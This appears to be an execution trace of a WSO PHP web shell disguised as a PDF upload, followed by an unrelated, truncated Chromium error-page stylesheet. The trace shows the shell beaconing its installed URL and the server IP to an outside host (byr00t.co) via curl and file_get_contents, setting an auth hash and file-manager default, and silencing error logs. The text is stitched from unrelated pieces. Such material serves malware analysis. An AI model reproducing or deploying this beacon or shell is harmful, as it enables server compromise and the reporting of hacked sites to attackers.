5 15 0 0.008056 1143912 getenv 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 3 1 'HTTP_CLIENT_IP'
5 15 1 0.008072 1143944
5 15 R FALSE
5 16 0 0.008087 1143912 getenv 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 5 1 'HTTP_X_FORWARDED_FOR'
5 16 1 0.008102 1143944
5 16 R FALSE
5 17 0 0.008115 1143912 getenv 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 12 1 'REMOTE_ADDR'
5 17 1 0.008131 1143984
5 17 R '127.0.0.1'
4 A /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 12 $ip = '127.0.0.1'
4 14 1 0.008161 1143952
4 14 R '127.0.0.1'
4 18 0 0.008176 1143976 base64_encode 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 16 1 'http://localhost/uploads/wso1.php.PDF'
4 18 1 0.008193 1144104
4 18 R 'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLlBERg=='
3 A /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 16 $x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLlBERg=='
4 19 0 0.008227 1143968 function_exists 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 17 1 'curl_init'
4 19 1 0.008243 1144008
4 19 R TRUE
4 20 0 0.008257 1143968 curl_init 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 19 0
4 20 1 0.008289 1144880
4 20 R resource(3) of type (curl)
3 A /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 19 $ch = resource(3) of type (curl)
4 21 0 0.008318 1144880 curl_setopt 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 19 3 resource(3) of type (curl) 10002 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLlBERg=='
4 21 1 0.008339 1144976
4 21 R TRUE
4 22 0 0.008353 1144880 curl_setopt 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 19 3 resource(3) of type (curl) 19913 TRUE
4 22 1 0.008412 1144976
4 22 R TRUE
4 23 0 0.008427 1144880 curl_exec 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 19 1 resource(3) of type (curl)
4 23 1 0.051570 1144912
4 23 R ''
3 A /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 19 $gitt = ''
4 24 0 0.051644 1144880 curl_close 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 19 1 resource(3) of type (curl)
4 24 1 0.051722 1144024
4 24 R NULL
4 25 0 0.051741 1143992 file_get_contents 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 21 1 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLlBERg=='
4 25 1 0.671137 1147704
4 25 R ''
3 A /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 21 $gitt = ''
3 A /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 26 $auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3 A /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 27 $color = '#00ff66'
3 A /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 28 $default_action = 'FilesMan'
4 26 0 0.671304 1147664 define 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 29 2 'SELF_PATH' '/var/www/html/uploads/wso1.php.PDF(4) : eval()\'d code(1) : eval()\'d code'
4 26 1 0.671335 1147768
4 26 R TRUE
4 27 0 0.671367 1147696 strpos 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 30 2 'python-requests/2.25.1' 'Google'
4 27 1 0.671384 1147768
4 27 R FALSE
4 28 0 0.671422 1147696 session_start 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 32 0
4 28 1 0.671507 1148448
4 28 R TRUE
4 29 0 0.671523 1148448 error_reporting 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 33 1 0
4 29 1 0.671538 1148488
4 29 R 0
4 30 0 0.671552 1148448 ini_set 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 34 2 'error_log' NULL
4 30 1 0.671568 1148520
4 30 R ''
4 31 0 0.671581 1148448 ini_set 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 35 2 'display_errors' 0
4 31 1 0.671596 1148520
4 31 R ''
4 32 0 0.671610 1148448 ini_set 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 36 2 'log_errors' 0
4 32 1 0.671624 1148520
4 32 R '1'
4 33 0 0.671637 1148448 ini_set 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 37 2 'max_execution_time' 0
4 33 1 0.671654 1148552
4 33 R '30'
4 34 0 0.671667 1148448 set_time_limit 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 38 1 0
4 34 1 0.671682 1148512
4 34 R FALSE
3 12 1 0.671706 1149960
2 7 1 0.671724 1062936
1 3 1 0.671732 1061360
1 35 0 0.671739 1061392 Error->__toString 0 Unknown 0 0
2 36 0 0.671752 1061472 Error->getTraceAsString 0 Unknown 0 0
2 36 1 0.671765 1061728
2 36 R '#0 /var/www/html/uploads/wso1.php.PDF(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php.PDF(4): eval()\n#2 {main}'
1 35 1 0.671785 1065864
1 35 R 'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/wso1.php.PDF(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/wso1.php.PDF(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php.PDF(4): eval()\n#2 {main}'
0.671840 986352
TRACE END [2023-02-13 00:45:05.844329]
<html dir="ltr" lang="en"><head>
<meta charset="utf-8">
<meta name="color-scheme" content="light dark">
<meta name="theme-color" content="#fff">
<meta name="viewport" content="width=device-width, initial-scale=1.0,
maximum-scale=1.0, user-scalable=no">
<title>localhost</title>
<style>/* Copyright 2017 The Chromium Authors
* Use of this source code is governed by a BSD-style license that can be
* found in the LICENSE file. */
a {
color: var(--link-color);
}
body {
--background-color: #fff;
--error-code-color: var(--google-gray-700);
--google-blue-100: rgb(210, 227, 252);
--google-blue-300: rgb(138, 180, 248);
--google-blue-600: rgb(26, 115, 232);
--google-blue-700: rgb(25, 103, 210);
--google-gray-100: rgb(241, 243, 244);
--google-gray-300: rgb(218, 220, 224);
--google-gray-500: rgb(154, 160, 166);
--google-gray-50: rgb(248, 249, 250);
--google-gray-600: rgb(128, 134, 139);
--google-gray-700: rgb(95, 99, 104);
--google-gray-800: rgb(60, 64, 67);
--google-gray-900: rgb(32, 33, 36);
--heading-color: var(--google-gray-900);
--link-color: rgb(88, 88, 88);
--popup-container-background-color: rgba(0,0,0,.65);
--primary-button-fill-color-active: var(--google-blue-700);
--primary-button-fill-color: var(--google-blue-600);
--primary-button-text-color: #fff;
--quiet-background-color: rgb(247, 247, 247);
--secondary-button-border-color: var(--google-gray-500);
--secondary-button-fill-color: #fff;
--secondary-button-hover-border-color: var(--google-gray-600);
--secondary-button-hover-fill-color: var(--google-gray-50);
--secondary-button-text-color: var(--google-gray-700);
--small-link-color: var(--google-gray-700);
--text-color: var(--google-gray-700);
background: var(--background-color);
color: var(--text-color);
word-wrap: break-word;
}
.nav-wrapper .secondary-button {
background: var(--secondary-button-fill-color);
border: 1px solid var(--secondary-button-border-color);
color: var(--secondary-button-text-color);
float: none;
margin: 0;
padding: 8px 16px;
}
.hidden {
display: none;
}
html {
-webkit-text-size-adjust: 100%;
font-size: 125%;
}
.icon {
background-repeat: no-repeat;
background-size: 100%;
}
@media (prefers-color-scheme: dark) {
body {
--background-color: var(--google-gray-900);
--error-code-color: var(--google-gray-500);
--heading-color: var(--google-gray-500);
--link-color: var(--google-blue-300);
--primary-button-fill-color-active: rgb(129, 162, 208);
--primary-button-fill-color: var(--google-blue-300);
--primary-button-text-color: var(--google-gray-900);
--quiet-background-color: var(--background-color);
--secondary-button-border-color: var(--google-gray-700);
--secondary-button-fill-color: var(--google-gray-900);
--secondary-button-hover-fill-color: rgb(48, 51, 57);
--secondary-button-text-color: var(--google-blue-300);
--small-link-color: var(--google-blue-300);
--text-color: var(--google-gray-500);
}
}
</style>
<style>/* Copyright 2014 The Chromium Authors
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file. */
button {
border: 0;
border-radius: 4px;
box-sizing: border-box;
color: var(--primary-button-text-color);
cursor: pointer;
float: right;
font-size: .875em;
margin: 0;
padding: 8px 16px;
transition: box-shadow 150ms cubic-bezier(0.4, 0, 0.2, 1);
user-select: none;
}
[dir='rtl'] button {
float: left;
}
.bad-clock button,
.captive-portal button,
.https-only button,
.insecure-form button,
.lookalike-url button,
.main-frame-blocked button,
.neterror button,
.pdf button,
.ssl button,
.enterprise-block button,
.enterprise-warn button,
.safe-browsing-billing button {
background: var(--primary-button-fill-color);
}
button:active {
background: var(--primary-button-fill-color-active);
outline: 0;
}
#debugging {
display: inline;
overflow: auto;
}
.debugging-content {
line-height: 1em;
margin-bottom: 0;
margin-top: 1em;
}
.debugging-content-fixed-width {
display: block;
font-family: monospace;
font-size: 1.2em;
margin-top: 0.5em;
}
.debugging-title {
font-weight: bold;
}
#details {
margin: 0 0 50px;
}
#details p:not(:first-of-type) {
margin-top: 20px;
}
.secondary-button:active {
border-color: white;
box-shadow: 0 1px 2px 0 rgba(60, 64, 67, .3),
0 2px 6px 2px rgba(60, 64, 67, .15);
}
.secondary-button:hover {
background: var(--secondary-button-hover-fill-color);
border-color: var(--secondary-button-hover-border-color);
text-decoration: none;
}
.error-code {
color: var(--error-code-color);
font-size: .8em;
margin-top: 12px;
text-transform: uppercase;
}
#error-debugging-info {
font-size: 0.8em;
}
h1 {
color: var(--heading-color);
font-size: 1.6em;
font-weight: normal;
line-height: 1.25em;
margin-bottom: 16px;
}
h2 {
font-size: 1.2em;
font-weight: normal;
}
.icon {
height: 72px;
margin: 0 0 40px;
width: 72px;
}
input[type=checkbox] {
opacity: 0;
}
input[type=checkbox]:focus ~ .checkbox::after {
outline: -webkit-focus-ring-color auto 5px;
}
.interstitial-wrapper {
box-sizing: border-box;
font-size: 1em;
line-height: 1.6em;
margin: 14vh auto 0;
max-width: 600px;
width: 100%;
}
#main-message > p {
display: inline;
}
#extended-reporting-opt-in {
font-size: .875em;
margin-top: 32px;
}
#extended-reporting-opt-in label {
display: grid;
grid-template-columns: 1.8em 1fr;
position: relative;
}
#enhanced-protection-message {
border-radius: 4px;
font-size: 1em;
margin-top: 32px;
padding: 10px 5px;
}
#enhanced-protection-message label {
display: grid;
grid-template-columns: 2.5em 1fr;
position: relative;
}
#enhanced-protection-message div {
margin: 0.5em;
}
#enhanced-protection-message .icon {
height: 1.5em;
vertical-align: middle;
width: 1.5em;
}
.nav-wrapper {
margin-top: 51px;
}
.nav-wrapper::after {
clear: both;
content: '';
display: table;
width: 100%;
}
.small-link {
color: var(--small-link-color);
font-size: .875em;
}
.checkboxes {
flex: 0 0 24px;
}
.checkbox {
--padding: .9em;
background: transparent;
display: block;
height: 1em;
left: -1em;
padding-inline-start: var(--padding);
position: absolute;
right: 0;
top: -.5em;
width: 1em;
}
.checkbox::after {
border: 1px solid white;
border-radius: 2px;
content: '';
height: 1em;
left: var(--padding);
position: absolute;
top: var(--padding);
width: 1em;
}
.checkbox::before {
background: transparent;
border: 2px solid white;
border-inline-end-width: 0;
border-top-width: 0;
content: '';
height: .2em;
left: calc(.3em + var(--padding));
opacity: 0;
position: absolute;
top: calc(.3em + var(--padding));
transform: rotate(-45deg);
width: .5em;
}
input[type=checkbox]:checked ~ .checkbox::before {
opacity: 1;
}
#recurrent-error-message {
background: #ededed;
border-radius: 4px;
margin-bottom: 16px;
margin-top: 12px;
padding: 12px 16px;
}
.showing-recurrent-error-message #extended-reporting-opt-in {
margin-top: 16px;
}
.showing-recurrent-error-message #enhanced-protection-message {
margin-top: 16px;
}
@media (max-width: 700px) {
.interstitial-wrapper {
padding: 0 10%;
}
#error-debugging-info {
overflow: auto;
}
}
@media (max-width: 420px) {
button,
[dir='rtl'] button,
.small-link {
float: none;
font-size: .825em;
font-weight: 500;
margin: 0;
width: 100%;
}
button {
padding: 16px 24px;
}
#details {
margin: 20px 0 20px 0;
}
#details p:not(:first-of-type) {
margin-top: 10px;
}
.secondary-button:not(.hidden) {
display: block;
margin-top: 20px;
text-align: center;
width: 100%;
}
.interstitial-wrapper {
padding: 0 5%;
}
#extended-reporting-opt-in {
margin-top: 24px;
}
#enhanced-protection-message {
margin-top: 24px;
}
.nav-wrapper {
margin-top: 30px;
}
}
/**
* Mobile specific styling.
* Navigation buttons are anchored to the bottom of the screen.
* Details message replaces the top content in its own scrollable area.
*/
@media (max-width: 420px) {
.nav-wrapper .secondary-button {
border: 0;
margin: 16px 0 0;
margin-inline-end: 0;
padding-bottom: 16px;
padding-top: 16px;
}
}
/* Fixed nav. */
@media (min-width: 240px) and (max-width: 420px) and
(min-height: 401px),
(min-width: 421px) and (min-height: 240px) and
(max-height: 560px) {
body .nav-wrapper {
background: var(--background-color);
bottom: 0;
box-shadow: 0 -12px 24px var(--background-color);
left: 0;
margin: 0 auto;
max-width: 736px;
padding-inline-end: 24px;
padding-inline-start: 24px;
position: fixed;
right: 0;
width: 100%;
z-index: 2;
}
.interstitial-wrapper {
max-width: 736px;
}
#details,
#main-content {
padding-bottom: 40px;
}
#details {
padding-top: 5.5vh;
}
button.small-link {
color: var(--google-blue-600);
}
}
@media (max-width: 420px) and (orientation: portrait),
(max-height: 560px) {
body {
margin: 0 auto;
}
button,
[dir='rtl'] button,
button.small-link,
.nav-wrapper .secondary-button {
font-family: Roboto-Regular,Helvetica;
font-size: .933em;
margin: 6px 0;
transform: translatez(0);
}
.nav-wrapper {
box-sizing: border-box;
padding-bottom: 8px;
width: 100%;
}
#details {
box-sizing: border-box;
height: auto;
margin: 0;
opacity: 1;
transition: opacity 250ms cubic-bezier(0.4, 0, 0.2, 1);
}
#details.hidden,
#main-content.hidden {
height: 0;
opacity: 0;
overflow: hidden;
padding-bottom: 0;
transition: none;
}
h1 {
font-size: 1.5em;
margin-bottom: 8px;
}
.icon {
margin-bottom: 5.69vh;
}
.interstitial-wrapper {
box-sizing: border-box;
margin: 7vh auto 12px;
padding: 0 24px;
position: relative;
}
.interstitial-wrapper p {
font-size: .95em;
line-height: 1.61em;
margin-top: 8px;
}
#main-content {
margin: 0;
transition: opacity 100ms cubic-bezier(0.4, 0, 0.2, 1);
}
.small-link {
border: 0;
}
.suggested-left > #control-buttons,
.suggested-right > #control-buttons {
float: none;
margin: 0;
}
}
@media (min-width: 421px) and (min-height: 500px) and (max-height: 560px) {
.interstitial-wrapper {
margin-top: 10vh;
}
}
@media (min-height: 400px) and (orientation:portrait) {
.interstitial-wrapper {
margin-bottom: 145px;
}
}
@media (min-height: 299px) {
.nav-wrapper {
padding-bottom: 16px;
}
}
@media (max-height: 560px) and (min-height: 240px) and (orientation:landscape) {
.extended-reporting-has-checkbox #details {
padding-bottom: 80px;
}
}
@media (min-height: 500px) and (max-height: 650px) and (max-width: 414px) and
(orientation: portrait) {
.interstitial-wrapper {
margin-top: 7vh;
}
}
@media (min-height: 650px) and (max-width: 414px) and (orientation: portrait) {
.interstitial-wrapper {
margin-top: 10vh;
}
}
/* Small mobile screens. No fixed nav. */
@media (max-height: 400px) and (orientation: portrait),
(max-height: 239px) and (orientation: landscape),
(max-width: 419px) and (max-height: 399px) {
.interstitial-wrapper {
display: flex;
flex-direction: column;
margin-bottom: 0;
}
#details {
flex: 1 1 auto;
order: 0;
}
#main-content {
flex: 1 1 auto;
order: 0;
}
.nav-wrapper {
flex: 0 1 auto;
margin-top: 8px;
order: 1;
padding-inline-end: 0;
padding-inline-start: 0;
position: relative;
width: 100%;
}
button,
.nav-wrapper .secondary-button {
padding: 16px 24px;
}
button.small-link {
color: var(--google-blue-600);
}
}
@media (max-width: 239px) and (orientation: portrait) {
.nav-wrapper {
padding-inline-end: 0;
padding-inline-start: 0;
}
}
</style>
<style>/* Copyright 2013 The Chromium Authors
* Use of this source code is governed by a BSD-style license that can be
* found in the LICENSE file. */
/* Don't use the main frame div when the error is in a subframe. */
html[subframe] #main-frame-error {
display: none;
}
/* Don't use the subframe error div when the error is in a main frame. */
html:not([subframe]) #sub-frame-error {
display: none;
}
h1 {
margin-top: 0;
word-wrap: break-word;
}
h1 span {
font-weight: 500;
}
a {
text-decoration: none;
}
.icon {
-webkit-user-select: none;
display: inline-block;
}
.icon-generic {
/* Can't access chrome://theme/IDR_ERROR_NETWORK_GENERIC from an untrusted
* renderer process, so embed the resource manually. */
content: -webkit-image-set(
url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEgAAABIAQMAAABvIyEEAAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAENJREFUeF7tzbEJACEQRNGBLeAasBCza2lLEGx0CxFGG9hBMDDxRy/72O9FMnIFapGylsu1fgoBdkXfUHLrQgdfrlJN1BdYBjQQm3UAAAAASUVORK5CYII=) 1x,
url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJAAAACQAQMAAADdiHD7AAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAFJJREFUeF7t0cENgDAMQ9FwYgxG6WjpaIzCCAxQxVggFuDiCvlLOeRdHR9yzjncHVoq3npu+wQUrUuJHylSTmBaespJyJQoObUeyxDQb3bEm5Au81c0pSCD8HYAAAAASUVORK5CYII=) 2x);
}
.icon-offline {
content: -webkit-image-set(
url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEgAAABIAQMAAABvIyEEAAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAGxJREFUeF7tyMEJwkAQRuFf5ipMKxYQiJ3Z2nSwrWwBA0+DQZcdxEOueaePp9+dQZFB7GpUcURSVU66yVNFj6LFICatThZB6r/ko/pbRpUgilY0Cbw5sNmb9txGXUKyuH7eV25x39DtJXUNPQGJtWFV+BT/QAAAAABJRU5ErkJggg==) 1x,
url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJAAAACQBAMAAAAVaP+LAAAAGFBMVEUAAABTU1NNTU1TU1NPT09SUlJSUlJTU1O8B7DEAAAAB3RSTlMAoArVKvVgBuEdKgAAAJ1JREFUeF7t1TEOwyAMQNG0Q6/UE+RMXD9d/tC6womIFSL9P+MnAYOXeTIzMzMzMzMzaz8J9Ri6HoITmuHXhISE8nEh9yxDh55aCEUoTGbbQwjqHwIkRAEiIaG0+0AA9VBMaE89Rogeoww936MQrWdBr4GN/z0IAdQ6nQ/FIpRXDwHcA+JIJcQowQAlFUA0MfQpXLlVQfkzR4igS6ENjknm/wiaGhsAAAAASUVORK5CYII=) 2x);
position: relative;
}
.icon-disabled {
content: -webkit-image-set(
url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAHAAAABICAMAAAAZF4G5AAAABlBMVEVMaXFTU1OXUj8tAAAAAXRSTlMAQObYZgAAASZJREFUeAHd11Fq7jAMRGGf/W/6PoWB67YMqv5DybwG/CFjRuR8JBw3+ByiRjgV9W/TJ31P0tBfC6+cj1haUFXKHmVJo5wP98WwQ0ZCbfUc6LQ6VuUBz31ikADkLMkDrfUC4rR6QGW+gF6rx7NaHWCj1Y/W6lf4L7utvgBSt3rBFSS/XBMPUILcJINHCBWYUfpWn4NBi1ZfudIc3rf6/NGEvEA+AsYTJozmXemjXeLZAov+mnkN2HfzXpMSVQDnGw++57qNJ4D1xitA2sJ+VAWMygSEaYf2mYPTjZfk2K8wmP7HLIH5Mg4/pP+PEcDzUvDMvYbs/2NWwPO5vBdMZE4EE5UTQLiBFDaUlTDPBRoJ9HdAYIkIo06og3BNXtCzy7zA1aXk5x+tJARq63eAygAAAABJRU5ErkJggg==) 1x,
url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAOAAAACQAQMAAAArwfVjAAAABlBMVEVMaXFTU1OXUj8tAAAAAXRSTlMAQObYZgAAAYdJREFUeF7F1EFqwzAUBNARAmVj0FZe5QoBH6BX+dn4GlY2PYNzGx/A0CvkCIJuvIraKJKbgBvzf2g62weDGD7CYggpfFReis4J0ey9EGFIiEQQojFSlA9kSIiqd0KkFjKsewgRbStEN19mxUPTtmW9HQ/h6tyqNQ8NlSMZdzyE6qkoE0trVYGFm0n1WYeBhduzwbwBC7voS+vIxfeMjeaiLxsMMtQNwMPtuew+DjzcTHk8YMfDknEcIUOtf2lVfgVH3K4Xv5PRYAXRVMtItIJ3rfaCIVn9DsTH2NxisAVRex2Hh3hX+/mRUR08bAwPEYsI51ZxWH4Q0SpicQRXeyEaIug48FEdegARfMz/tADVsRciwTAxW308ehmC2gLraC+YCbV3QoTZexa+zegAEW5PhhgYfmbvJgcRqngGByOSXdFJcLk2JeDPEN0kxe1JhIt5FiFA+w+ItMELsUyPF2IaJ4aILqb4FbxPwhImwj6JauKgDUCYaxmYIsd4KXdMjIC9ItB5Bn4BNRwsG0XM2nwAAAAASUVORK5CYII=) 2x);
width: 112px;
}
.hidden {
display: none;
}
#suggestions-list a {
color: var(--google-blue-600);
}
#suggestions-list p {
margin-block-end: 0;
}
#suggestions-list ul {
margin-top: 0;
}
.single-suggestion {
list-style-type: none;
padding-inline-start: 0;
}
#error-information-button {
content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBmaWxsPSJub25lIiBkPSJNMCAwaDI0djI0SDB6Ii8+PHBhdGggZD0iTTExIDE4aDJ2LTJoLTJ2MnptMS0xNkM2LjQ4IDIgMiA2LjQ4IDIgMTJzNC40OCAxMCAxMCAxMCAxMC00LjQ4IDEwLTEwUzE3LjUyIDIgMTIgMnptMCAxOGMtNC40MSAwLTgtMy41OS04LThzMy41OS04IDgtOCA4IDMuNTkgOCA4LTMuNTkgOC04IDh6bTAtMTRjLTIuMjEgMC00IDEuNzktNCA0aDJjMC0xLjEuOS0yIDItMnMyIC45IDIgMmMwIDItMyAxLjc1LTMgNWgyYzAtMi4yNSAzLTIuNSAzLTUgMC0yLjIxLTEuNzktNC00LTR6Ii8+PC9zdmc+);
height: 24px;
vertical-align: -.15em;
width: 24px;
}
.use-popup-container#error-information-popup-container
#error-information-popup {
align-items: center;
background-color: var(--popup-container-background-color);
display: flex;
height: 100%;
left: 0;
position: fixed;
top: 0;
width: 100%;
z-index: 100;
}
.use-popup-container#error-information-popup-container
#error-information-popup-content > p {
margin-bottom: 11px;
margin-inline-start: 20px;
}
.use-popup-container#error-information-popup-container #suggestions-list ul {
margin-inline-start: 15px;
}
.use-popup-container#error-information-popup-container
#error-information-popup-box {
background-color: var(--background-color);
left: 5%;
padding-bottom: 15px;
padding-top: 15px;
position: fixed;
width: 90%;
z-index: 101;
}
.use-popup-container#error-information-popup-container div.error-code {
margin-inline-start: 20px;
}
.use-popup-container#error-information-popup-container #suggestions-list p {
margin-inline-start: 20px;
}
:not(.use-popup-container)#error-information-popup-container
#error-information-popup-close {
display: none;
}
#error-information-popup-close {
margin-bottom: 0;
margin-inline-end: 35px;
margin-top: 15px;
text-align: end;
}
.link-button {
color: rgb(66, 133, 244);
display: inline-block;
font-weight: bold;
text-transform: uppercase;
}
#sub-frame-error-details {
color: #8F8F8F;
/* Not done on mobile for performance reasons. */
text-shadow: 0 1px 0 rgba(255,255,255,0.3);
}
[jscontent=hostName],
[jscontent=failedUrl] {
overflow-wrap: break-word;
}
.secondary-button {
background: #d9d9d9;
color: #696969;
margin-inline-end: 16px;
}
.snackbar {
background: #323232;
border-radius: 2px;
bottom: 24px;
box-sizing: border-box;
color: #fff;
font-size: .87em;
left: 24px;
max-width: 568px;
min-width: 288px;
opacity: 0;
padding: 16px 24px 12px;
position: fixed;
transform: translateY(90px);
will-change: opacity, transform;
z-index: 999;
}
.snackbar-show {
-webkit-animation:
show-snackbar 250ms cubic-bezier(0, 0, 0.2, 1) forwards,
hide-snackbar 250ms cubic-bezier(0.4, 0, 1, 1) forwards 5s;
}
@-webkit-keyframes show-snackbar {
100% {
opacity: 1;
transform: translateY(0);
}
}
@-webkit-keyframes hide-snackbar {
0% {
opacity: 1;
transform: translateY(0);
}
100% {
opacity: 0;
transform: translateY(90px);
}
}
.suggestions {
margin-top: 18px;
}
.suggestion-header {
font-weight: bold;
margin-bottom: 4px;
}
.suggestion-body {
color: #777;
}
/* Decrease padding at low sizes. */
@media (max-width: 640px), (max-height: 640px) {
h1 {
margin: 0 0 15px;
}
.suggestions {
margin-top: 10px;
}
.suggestion-header {
margin-bottom: 0;
}
}
#download-link,
#download-link-clicked {
margin-bottom: 30px;
margin-top: 30px;
}
#download-link-clicked {
color: #BBB;
}
#download-link::before,
#download-link-clicked::before {
content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxLjJlbSIgaGVpZ2h0PSIxLjJlbSIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNNSAyMGgxNHYtMkg1bTE0LTloLTRWM0g5djZINWw3IDcgNy03eiIgZmlsbD0iIzQyODVGNCIvPjwvc3ZnPg==);
display: inline-block;
margin-inline-end: 4px;
vertical-align: -webkit-baseline-middle;
}
#download-link-clicked::before {
opacity: 0;
width: 0;
}
#offline-content-list-visibility-card {
border: 1px solid white;
border-radius: 8px;
display: flex;
font-size: .8em;
justify-content: space-between;
line-height: 1;
}
#offline-content-list.list-hidden #offline-content-list-visibility-card {
border-color: rgb(218, 220, 224);
}
#offline-content-list-visibility-card > div {
padding: 1em;
}
#offline-content-list-title {
color: var(--google-gray-700);
}
#offline-content-list-show-text,
#offline-content-list-hide-text {
color: rgb(66, 133, 244);
}
/* Hides the "hide" text div when the offline content list is collapsed/hidden
* and, alternatively, hides the "show" text div when the offline content list
* is expanded/shown.
*/
#offline-content-list.list-hidden #offline-content-list-hide-text,
#offline-content-list:not(.list-hidden) #offline-content-list-show-text {
display: none;
}
/* Controls the animation of the offline content list when it is expanded/shown.
*/
#offline-content-suggestions {
/* Max-height has to be set for the height animation to work. The chosen value
* is a little greater than the maximum height the list will have, when all
* suggestions have images, so that it is never clamped. This makes so that
* when the actual height is smaller then the animation is not as smooth.
*/
max-height: 27em;
transition: max-height 200ms ease-in, visibility 0s 200ms,
opacity 200ms 200ms linear;
}
/* Controls the animation of the offline content list when it is
* collapsed/hidden.
*/
#offline-content-list.list-hidden #offline-content-suggestions {
max-height: 0;
opacity: 0;
transition: opacity 200ms linear, visibility 0s 200ms,
max-height 200ms 200ms ease-out;
visibility: hidden;
}
#offline-content-list {
margin-inline-start: -5%;
width: 110%;
}
/* The selectors below adjust the "overflow" of the suggestion cards contents
* based on the same screen size based strategy used for the main frame, which
* is applied by the `interstitial-wrapper` class. */
@media (max-width: 420px) {
#offline-content-list {
margin-inline-start: -2.5%;
width: 105%;
}
}
@media (max-width: 420px) and (orientation: portrait),
(max-height: 560px) {
#offline-content-list {
margin-inline-start: -12px;
width: calc(100% + 24px);
}
}
.suggestion-with-image .offline-content-suggestion-thumbnail {
flex-basis: 8.2em;
flex-shrink: 0;
}
.suggestion-with-image .offline-content-suggestion-thumbnail > img {
height: 100%;
width: 100%;
}
.suggestion-with-image #offline-content-list:not(.is-rtl)
.offline-content-suggestion-thumbnail > img {
border-bottom-right-radius: 7px;
border-top-right-radius: 7px;
}
.suggestion-with-image #offline-content-list.is-rtl
.offline-content-suggestion-thumbnail > img {
border-bottom-left-radius: 7px;
border-top-left-radius: 7px;
}
.suggestion-with-icon .offline-content-suggestion-thumbnail {
align-items: center;
display: flex;
justify-content: center;
min-height: 4.2em;
min-width: 4.2em;
}
.suggestion-with-icon .offline-content-suggestion-thumbnail > div {
align-items: center;
background-color: rgb(241, 243, 244);
border-radius: 50%;
display: flex;
height: 2.3em;
justify-content: center;
width: 2.3em;
}
.suggestion-with-icon .offline-content-suggestion-thumbnail > div > img {
height: 1.45em;
width: 1.45em;
}
.offline-content-suggestion-favicon {
height: 1em;
margin-inline-end: 0.4em;
width: 1.4em;
}
.offline-content-suggestion-favicon > img {
height: 1.4em;
width: 1.4em;
}
.no-favicon .offline-content-suggestion-favicon {
display: none;
}
.image-video {
